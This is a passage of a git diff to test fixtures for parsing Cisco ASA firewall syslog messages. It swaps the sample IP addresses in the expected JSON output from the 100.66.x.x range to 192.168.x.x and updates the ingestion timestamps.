dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src 
outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json index 6a71157f134..d89b51ee8f0 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json @@ -10,8 +10,8 @@ }, "destination": { "port": 8256, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1772, @@ -51,7 +51,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -59,8 +59,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111550576Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256", + "ingested": "2021-12-09T13:31:36.363216200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -93,8 +93,8 @@ }, "source": { "port": 80, - "address": "100.66.205.104", - "ip": "100.66.205.104" + "address": "192.168.205.104", + "ip": "192.168.205.104" }, "tags": [ "preserve_original_event" @@ -129,7 +129,7 @@ "localhost" ], "ip": [ - "100.66.205.104", + "192.168.205.104", "172.31.98.44" ] }, @@ -138,8 +138,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111556081Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", + "ingested": "2021-12-09T13:31:36.363224400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -155,7 +155,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.104", + "mapped_source_ip": "192.168.205.104", "connection_id": "11757", "source_interface": "outside", "mapped_destination_port": 1772 @@ -177,8 +177,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" 
@@ -213,7 +213,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -224,8 +224,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111559421Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363228700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -262,8 +262,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -298,7 +298,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -309,8 +309,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111561357Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363232700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -347,8 +347,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" 
@@ -383,7 +383,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -394,8 +394,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111563080Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363237300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -432,8 +432,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -468,7 +468,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -479,8 +479,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111564689Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363241900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -517,8 +517,8 @@ }, "source": { "port": 80, - "address": "100.66.160.197", - "ip": "100.66.160.197" + "address": "192.168.160.197", + "ip": "192.168.160.197" }, "tags": [ "preserve_original_event" 
@@ -553,7 +553,7 @@ "localhost" ], "ip": [ - "100.66.160.197", + "192.168.160.197", "172.31.98.44" ] }, @@ -564,8 +564,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111566358Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363246800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -602,8 +602,8 @@ }, "source": { "port": 80, - "address": "100.66.205.14", - "ip": "100.66.205.14" + "address": "192.168.205.14", + "ip": "192.168.205.14" }, "tags": [ "preserve_original_event" @@ -638,7 +638,7 @@ "localhost" ], "ip": [ - "100.66.205.14", + "192.168.205.14", "172.31.98.44" ] }, @@ -649,8 +649,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111567977Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363252300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -687,8 +687,8 @@ }, "source": { "port": 80, - "address": "100.66.124.33", - "ip": "100.66.124.33" + "address": "192.168.124.33", + "ip": "192.168.124.33" }, "tags": [ "preserve_original_event" 
@@ -723,7 +723,7 @@ "localhost" ], "ip": [ - "100.66.124.33", + "192.168.124.33", "172.31.98.44" ] }, @@ -734,8 +734,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111569614Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363256500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -772,8 +772,8 @@ }, "source": { "port": 80, - "address": "100.66.35.9", - "ip": "100.66.35.9" + "address": "192.168.35.9", + "ip": "192.168.35.9" }, "tags": [ "preserve_original_event" @@ -808,7 +808,7 @@ "localhost" ], "ip": [ - "100.66.35.9", + "192.168.35.9", "172.31.98.44" ] }, @@ -819,8 +819,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111571296Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363260700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -857,8 +857,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" 
@@ -893,7 +893,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -904,8 +904,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111572966Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363265400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -942,8 +942,8 @@ }, "source": { "port": 80, - "address": "100.66.218.21", - "ip": "100.66.218.21" + "address": "192.168.218.21", + "ip": "192.168.218.21" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ "localhost" ], "ip": [ - "100.66.218.21", + "192.168.218.21", "172.31.98.44" ] }, @@ -989,8 +989,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111574850Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363269900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1027,8 +1027,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" 
@@ -1063,7 +1063,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1074,8 +1074,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111576497Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363274400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1112,8 +1112,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1148,7 +1148,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1159,8 +1159,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111578094Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363279300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1197,8 +1197,8 @@ }, "source": { "port": 80, - "address": "100.66.202.211", - "ip": "100.66.202.211" + "address": "192.168.202.211", + "ip": "192.168.202.211" }, "tags": [ "preserve_original_event" 
@@ -1233,7 +1233,7 @@ "localhost" ], "ip": [ - "100.66.202.211", + "192.168.202.211", "172.31.98.44" ] }, @@ -1244,8 +1244,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111579805Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363283900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1282,8 +1282,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1318,7 +1318,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1329,8 +1329,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111581438Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363288600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -1367,8 +1367,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" 
@@ -1403,7 +1403,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1414,8 +1414,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111583241Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363293800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1452,8 +1452,8 @@ }, "source": { "port": 80, - "address": "100.66.209.247", - "ip": "100.66.209.247" + "address": "192.168.209.247", + "ip": "192.168.209.247" }, "tags": [ "preserve_original_event" @@ -1488,7 +1488,7 @@ "localhost" ], "ip": [ - "100.66.209.247", + "192.168.209.247", "172.31.98.44" ] }, @@ -1499,8 +1499,8 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111584913Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363299700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:45.000Z", @@ -1537,8 +1537,8 @@ }, "source": { "port": 80, - "address": "100.66.35.162", - "ip": "100.66.35.162" + "address": "192.168.35.162", + "ip": "192.168.35.162" }, "tags": [ "preserve_original_event" 
@@ -1573,7 +1573,7 @@ "localhost" ], "ip": [ - "100.66.35.162", + "192.168.35.162", "172.31.98.44" ] }, @@ -1584,8 +1584,8 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-07-19T09:06:02.111586589Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "ingested": "2021-12-09T13:31:36.363337100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:26.000Z", @@ -1617,8 +1617,8 @@ }, "destination": { "port": 1188, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -1658,7 +1658,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -1666,8 +1666,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111588192Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188", + "ingested": "2021-12-09T13:31:36.363344400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1700,8 +1700,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1736,7 +1736,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, 
@@ -1745,8 +1745,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111589869Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363350400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1762,7 +1762,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.80.32", + "mapped_source_ip": "192.168.80.32", "connection_id": "11758", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1784,8 +1784,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1820,7 +1820,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1830,8 +1830,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111591537Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", + "ingested": "2021-12-09T13:31:36.363356400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -1868,8 +1868,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1904,7 +1904,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1913,8 +1913,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111593139Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363361Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1930,7 +1930,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.6", + "mapped_source_ip": "192.168.252.6", "connection_id": "11759", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1952,8 +1952,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1988,7 +1988,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, 
@@ -1998,8 +1998,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111594912Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", + "ingested": "2021-12-09T13:31:36.363365200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2031,8 +2031,8 @@ }, "destination": { "port": 8257, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1773, @@ -2072,7 +2072,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2080,8 +2080,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111596585Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257", + "ingested": "2021-12-09T13:31:36.363369600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2114,8 +2114,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2150,7 +2150,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, 
